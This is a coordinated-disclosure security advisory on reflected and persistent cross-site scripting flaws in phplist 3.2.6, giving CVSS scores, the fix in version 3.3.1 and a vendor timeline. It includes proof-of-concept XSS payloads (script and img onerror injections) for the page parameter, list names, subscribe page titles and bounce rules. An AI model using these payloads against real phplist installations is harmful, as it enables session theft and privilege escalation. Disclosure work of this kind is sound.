phplist 3.2.6: XSS
Author: Tim CoenDate: 2017-02-20 14:19:49
1. Introduction
| Affected Product: | phplist 3.2.6 |
| Fixed in: | 3.3.1 |
| Fixed Version Link: | https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download |
| Vendor Website: | https://www.phplist.org/ |
| Vulnerability Type: | XSS |
| Remote Exploitable: | Yes |
| Reported to vendor: | 01/10/2017 |
| Disclosed to public: | 02/20/2017 |
| Release mode: | Coordinated Release |
| CVE: | n/a (not requested) |
| Credits | Tim Coen of curesec GmbH |
2. Overview
phplist is an application to manage newsletters, written in PHP. In version 3.2.6, it is vulnerable to reflected and persitent Cross Site Scripting vulnerabilities. The persistent XSS vulnerability is only exploitable by users with specific privileges and may be used for escalating privileges.
3. Details
Reflected XSS
CVSS: Medium 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
The page parameter is vulnerable to reflected XSS.
Proof of Concept:
http://localhost/lists/admin/?page=send\'\"><script>alert(8)</script>&id=187&tk=c
Persistent XSS
CVSS: Medium 5.5 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
Various components of the administration interface are vulnerable to persistent XSS. While a user account is required to exploit these issues, they may be used by less privileged users to escalate their privileges.
Persistent XSS: List Name
The name of a list is echoed in various locations without encoding, leading to persistent XSS. An account with the privilege to create a list is required.
Add new List: http://localhost/lists/admin/?page=editlist&tk=c as name use : list'"><img src=no onerror=alert(1)> To trigger the payload, visit - Add new subscribers to list: http://localhost/lists/admin/?page=importsimple&list=84&tk=c - Overview of all lists: http://localhost/lists/admin/?page=list&tk=c - List members of list: http://localhost/lists/admin/?page=members&id=3&tk=c - View member (loaded as part of the lists tab): http://localhost/lists/admin/?page=user&id=4 - Creating a Campaign (in step 4): http://localhost/lists/admin/?page=send&id=2&tk=c&tab=Lists
Persistent XSS: Subscribe Page
Various parameters of the subscribe page - such as the title - are vulnerable to persistent XSS. An account with the privilege to edit the subscribe page is required.
Add a new subscribe page: http://localhost/lists/admin/?page=spage as title use: subscribe'"><img src=no onerror=alert(1)> To trigget the payload: - Visit the subscribe page: http://localhost/lists/index.php?p=subscribe&id=1 - Visit the subscribe page overview: http://localhost/lists/admin/?page=spage
Persistent XSS: Bounce Rule
The expression parameter of bounce rules is vulnerable to persistent XSS. An account with the privilege to edit bounce rules is required.
Add a new bounce rule:http://localhost/lists/admin/?page=bouncerules&type=active as regular expression use: test'"&ht;<img src=no onerror=alert(1)&ht; To trigger the payload: - Visit the bounce rule overview: http://localhost/lists/admin/?page=bouncerules&type=active
4. Solution
To mitigate this issue please upgrade at least to version 3.3.1:
https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download
Please note that a newer version might already be available.
5. Report Timeline
| 01/10/2017 | Informed Vendor about Issue |
| 01/16/2017 | Vendor confirms |
| 02/15/2017 | Asked Vendor to confirm that new release fixes issues |
| 02/15/2017 | Vendor confirms |
| 02/20/2017 | Disclosed to public |